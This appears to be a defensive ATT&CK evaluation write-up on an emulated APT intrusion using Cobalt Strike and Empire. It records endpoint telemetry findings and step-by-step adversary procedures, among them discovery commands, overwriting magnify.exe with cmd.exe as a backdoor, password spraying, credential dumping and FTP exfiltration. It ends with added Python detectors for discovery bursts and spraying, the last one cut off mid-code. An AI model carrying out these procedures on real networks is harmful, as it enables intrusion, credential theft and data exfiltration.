The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe.
Enrichment
The capability enriched reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing reg with command-line arguments to check if terminal services were enabled (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments as the terminal server key queried by the reg utility (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
The capability enriched takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder. The data was tainted by a parent alert on cmd.exe.
Enrichment
The capability enriched takeown.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
Telemetry showing powershell.exe executing takeown with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder (tainted by a parent alert on cmd.exe)
Enrichment of takeown.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification)
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment
The capability enriched icacls.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification).
Telemetry showing powershell.exe executing icacls with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of icacls.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification)
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
Telemetry showed file write events overwriting magnify.exe in the system directory as well as the change in the hash of the file. The telemetry was tainted by a parent alert on cmd.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing file write events overwriting magnify.exe in the system directory (tainted by a parent alert on cmd.exe)
Telemetry showing change in the hash of magnify.exe
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed an event with the execution of the Get-ChildItem command. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing an event with the execution of the Get-ChildItem command (tainted by a parent alert on wscript.exe)
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
Telemetry showed file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin (tainted by a parent alert on wscript.exe)
Data from Network Shared Drive
(T1039)
Telemetry (Tainted)
Telemetry showed a file read event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker). The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine reading files from network locations. The alert was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing a file event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) (tainted by a parent alert on wscript.exe)
Specific Behavior alert for a script engine reading files from network locations (tainted by a parent alert on wscript.exe)
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
Telemetry showed the MD5 and SHA256 hash values of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing file create/write and hash values of recycler.exe (tainted by a parent alert on wscript.exe)
Remote File Copy
(T1105)
Telemetry (Tainted)
Telemetry showed the file create and write events for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
General Behavior (Tainted)
A General Behavior alert was generated for PowerShell dropping an executable file to disk. The alert was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
A General Behavior alert was generated for executables created to disk by the Windows scripting engine. The alert was tainted by a parent alert on wscript.exe.
Telemetry showing the file create and write events for recycler.exe (tainted by a parent alert on wscript.exe)
General Behavior alert for PowerShell dropping an executable file to disk (tainted by a parent alert on wscript.exe)
General Behavior alert for executables created to disk by the Windows scripting engine (tainted by a parent alert on wscript.exe)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Data Encrypted
(T1022)
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Masquerading
(T1036)
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched recycler.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading).
Telemetry showing recycler.exe execution (tainted by a parent alert on wscript.exe)
Enrichment of recycler.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Telemetry (Tainted)
Telemetry showed the execution of ftp.exe and command-line arguments as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing ftp.exe execution (tainted by a parent alert on wscript.exe)
Telemetry showing an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21 (tainted by a parent alert on wscript.exe)
Enrichment of ftp.exe as the execution of a CLI file transfer/copy utility (tainted by a parent alert on wscript.exe)
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry (Tainted)
Telemetry showed the file delete event for old.rar. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing the file delete event for old.rar (tainted by a parent alert on wscript.exe)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry (Tainted)
Telemetry showed the file delete event for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing the file delete event for recycler.exe (tainted by a parent alert on wscript.exe)
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
Telemetry showed magnify.exe executing from utilman.exe.
Telemetry showing magnify.exe executing from utilman.exe
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389.
Telemetry showing an inbound connection to Creeper (10.0.0.4) on port 3389
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry
Telemetry showed magnify.exe executing whoami.exe.
Enrichment
The capability enriched whoami.exe executing as an enumeration command.
Telemetry showing magnify.exe executing whoami.exe
Enrichment of whoami.exe executing as an enumeration command

Operational Flow

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key
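
Steps 12 and 13 are a run of individually unremarkable commands (route, ipconfig, whoami, qprocess, net, netstat, reg query) that only stand out when they are seen together under one parent process in a short span of time. The detection logic below is an added illustration of that correlation; it is not code from the ATT&CK evaluation, from MITRE or from the vendor. Its input is a set of constructed Sysmon-style process-creation records: the hostnames follow the evaluation, while the timestamps, PIDs, the parent image and the one-off admin command on Morris are hypothetical.

```python
"""Correlate a burst of host and domain discovery commands under one parent.

Added illustration for the Step 12-13 procedures; not code from the ATT&CK
evaluation, MITRE or the vendor. SAMPLE_EVENTS are constructed Sysmon-style
process-creation records (hypothetical timestamps, PIDs and parent images).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery command families from Steps 12-13, matched against the lower-cased
# command line. "net" re-spawns itself as net1.exe, so both spellings count.
DISCOVERY_PATTERNS = {
    "net_config":  re.compile(r"\b(ipconfig(\.exe)?\s+/all|route(\.exe)?\s+print)\b"),
    "owner_user":  re.compile(r"\bwhoami(\.exe)?\b"),
    "processes":   re.compile(r"\b(qprocess|tasklist)(\.exe)?\b"),
    "services":    re.compile(r"\bnet1?(\.exe)?\s+start\b|\bsc(\.exe)?\s+query\b"),
    "groups":      re.compile(r"\bnet1?(\.exe)?\s+(local)?group\b"),
    "accounts":    re.compile(r"\bnet1?(\.exe)?\s+user\b"),
    "connections": re.compile(r"\bnet1?(\.exe)?\s+use\b|\bnetstat(\.exe)?\b"),
    "registry":    re.compile(r"\breg(\.exe)?\s+query\b"),
}

FIELDS = ("host", "time", "parent_image", "parent_pid", "cmd")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    # CodeRed (10.0.1.5): the Step 12-13 commands, all children of one PowerShell
    ("CodeRed", "2018-10-30T14:02:10", "powershell.exe", 4120, "route print"),
    ("CodeRed", "2018-10-30T14:02:25", "powershell.exe", 4120, "ipconfig /all"),
    ("CodeRed", "2018-10-30T14:02:41", "powershell.exe", 4120, "whoami /all /fo list"),
    ("CodeRed", "2018-10-30T14:03:05", "powershell.exe", 4120, "qprocess *"),
    ("CodeRed", "2018-10-30T14:03:30", "powershell.exe", 4120, "net start"),
    ("CodeRed", "2018-10-30T14:04:02", "powershell.exe", 4120, 'net group "Domain Admins" /domain'),
    ("CodeRed", "2018-10-30T14:04:20", "powershell.exe", 4120, "net user /domain"),
    ("CodeRed", "2018-10-30T14:05:11", "powershell.exe", 4120, "netstat -ano"),
    ("CodeRed", "2018-10-30T14:05:40", "powershell.exe", 4120,
     r"reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"),
    # Morris: a help-desk admin running a single diagnostic command (constructed noise)
    ("Morris", "2018-10-30T14:03:00", "cmd.exe", 902, "ipconfig /all"),
]]


def classify(cmd):
    """Return the discovery families a command line belongs to (usually 0 or 1)."""
    low = cmd.lower()
    return [name for name, pat in DISCOVERY_PATTERNS.items() if pat.search(low)]


def find_discovery_bursts(events, window=timedelta(minutes=5), min_families=4):
    """Alert on a parent process whose children cover >= min_families discovery
    families inside some span no longer than `window`; one alert per parent,
    reporting the span that covers the most families."""
    by_parent = defaultdict(list)
    for ev in events:
        families = classify(ev["cmd"])
        if families:
            key = (ev["host"], ev["parent_image"], ev["parent_pid"])
            by_parent[key].append((datetime.fromisoformat(ev["time"]), ev["cmd"], families))
    alerts = []
    for (host, image, pid), hits in by_parent.items():
        hits.sort(key=lambda h: h[0])
        best_fams, best_span, start = set(), [], 0
        for end in range(len(hits)):          # sliding time window over the hits
            while hits[end][0] - hits[start][0] > window:
                start += 1
            span = hits[start:end + 1]
            fams = {f for _, _, fs in span for f in fs}
            if len(fams) > len(best_fams):
                best_fams, best_span = fams, span
        if len(best_fams) >= min_families:
            alerts.append({"host": host, "parent": f"{image} (pid {pid})",
                           "families": sorted(best_fams),
                           "commands": [c for _, c, _ in best_span],
                           "first": best_span[0][0].isoformat(),
                           "last": best_span[-1][0].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(alert["host"], alert["parent"], alert["families"])
```

On the constructed sample this produces one alert, for the PowerShell parent on CodeRed, covering all eight families; the single ipconfig on Morris never reaches the threshold. Keying on the parent process rather than the user is what separates an agent-driven enumeration from an administrator typing the same commands over an afternoon, and it also carries the tainting context the evaluation notes rely on: the parent is the Empire PowerShell process.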

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to perform brute-force (password spraying) authentication attempts against Morris (10.0.1.4) and Nimda (10.0.1.6) using the credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
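
Procedures 16.A.1 and 16.B.1 describe the classic spray-then-succeed pattern: a few accounts tried against a few hosts from one source, followed by a good logon from the same source as one of those accounts. The detector below is an added illustration of how that reads in the target hosts' Security logs; it is not code from the ATT&CK evaluation, from MITRE or from the vendor. The records are constructed from the fields of event IDs 4625 (failed logon) and 4624 (successful logon); the timestamps, the mistyped Debbie logon and the single-account source 10.0.0.9 are hypothetical and exist only to show how a spray is told apart from noise and from single-account brute force.

```python
"""Classify failed network logons per source as password spraying (many accounts,
few tries each) or single-account brute force, and note a following success.

Added illustration for procedures 16.A.1 and 16.B.1; not code from the ATT&CK
evaluation, MITRE or the vendor. SAMPLE_LOGONS are constructed records shaped
like Security events 4625/4624 (timestamps and source 10.0.0.9 hypothetical).
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def logon(time, event_id, target_host, user, source_ip, logon_type=3):
    return {"time": datetime.fromisoformat(time), "event_id": event_id,
            "target_host": target_host, "user": user.lower(),
            "source_ip": source_ip, "logon_type": logon_type}


SAMPLE_LOGONS = [
    # 16.A.1: CodeRed (10.0.1.5) tries three accounts against Morris and Nimda
    logon("2018-10-30T15:00:00", 4625, "Morris", "Kmitnick", "10.0.1.5"),
    logon("2018-10-30T15:00:03", 4625, "Morris", "Bob", "10.0.1.5"),
    logon("2018-10-30T15:00:06", 4625, "Morris", "Frieda", "10.0.1.5"),
    logon("2018-10-30T15:00:10", 4625, "Nimda", "Kmitnick", "10.0.1.5"),
    logon("2018-10-30T15:00:13", 4625, "Nimda", "Bob", "10.0.1.5"),
    logon("2018-10-30T15:00:16", 4625, "Nimda", "Frieda", "10.0.1.5"),
    # 16.B.1: the same source then authenticates to Conficker as Kmitnick
    logon("2018-10-30T15:01:30", 4624, "Conficker", "Kmitnick", "10.0.1.5"),
    # constructed noise: one mistyped password, and a source hammering one account
    logon("2018-10-30T15:00:30", 4625, "Conficker", "Debbie", "10.0.1.6"),
] + [logon(f"2018-10-30T15:05:{s:02d}", 4625, "Morris", "Administrator", "10.0.0.9")
     for s in range(0, 40, 5)]


def detect_spraying(events, window=timedelta(minutes=10), min_failures=5, min_users=3):
    """One alert per source IP whose failed network logons (type 3: SMB, net use)
    reach min_failures inside `window`; kind is 'spray' when the failures are
    spread over >= min_users accounts, else 'brute_force'."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e["logon_type"] != 3:
            continue
        if e["event_id"] == 4625:
            failures[e["source_ip"]].append(e)
        elif e["event_id"] == 4624:
            successes[e["source_ip"]].append(e)
    alerts = []
    for src, fails in failures.items():
        fails.sort(key=lambda e: e["time"])
        best, start = [], 0
        for end in range(len(fails)):          # densest window of failures
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            if end - start + 1 > len(best):
                best = fails[start:end + 1]
        if len(best) < min_failures:
            continue
        per_user = Counter(e["user"] for e in best)
        kind = "spray" if len(per_user) >= min_users else "brute_force"
        # a later success from the same source as one of the attempted accounts
        follow = [e for e in successes.get(src, [])
                  if e["time"] >= best[0]["time"] and e["user"] in per_user]
        alerts.append({"source_ip": src, "kind": kind,
                       "users": sorted(per_user),
                       "hosts": sorted({e["target_host"] for e in best}),
                       "attempts": len(best),
                       "followed_by_success": [(e["user"], e["target_host"]) for e in follow]})
    return alerts


if __name__ == "__main__":
    for a in detect_spraying(SAMPLE_LOGONS):
        print(a["source_ip"], a["kind"], a["users"], a["followed_by_success"])
```

The success correlation is the part worth keeping: a spray that is followed by a 4624 for one of the sprayed accounts is no longer a failed-logon statistic but a confirmed credential compromise, and the (user, host) pair it returns is exactly what 16.B.1 through 16.D.1 record for Kmitnick on Conficker.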

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate an FTP command script (ftp.txt), which is then executed by FTP to exfiltrate data over a network connection separate from the existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'
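
Steps 17 and 19 are both ordered chains of otherwise low-signal events: takeown, then icacls, then a write to an accessibility binary under System32; and a renamed archiver, then an archive appearing in $Recycle.Bin, then ftp.exe driven by a -s: script, then the archive deleted. The matcher below is an added illustration of detecting both as sequences on one host rather than as isolated events; it is not code from the ATT&CK evaluation, from MITRE or from the vendor. The events are constructed records in a Sysmon-like shape (process create with OriginalFileName from the PE version resource, file create, file delete); the paths, timestamps, archiver command line, the servicing write on Morris and the FTP destination 192.0.2.10 are hypothetical.

```python
"""Match ordered attack chains against a per-host event stream.

Added illustration for Steps 17 and 19; not code from the ATT&CK evaluation,
MITRE or the vendor. SAMPLE_EVENTS are constructed Sysmon-like records
(process / file_write / file_delete) with hypothetical paths and timestamps.
"""
import re
from datetime import datetime, timedelta

ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe")
ACC = "|".join(re.escape(b) for b in ACCESSIBILITY_BINARIES)
SERVICING = ("tiworker.exe", "trustedinstaller.exe")   # legitimate writers of those files
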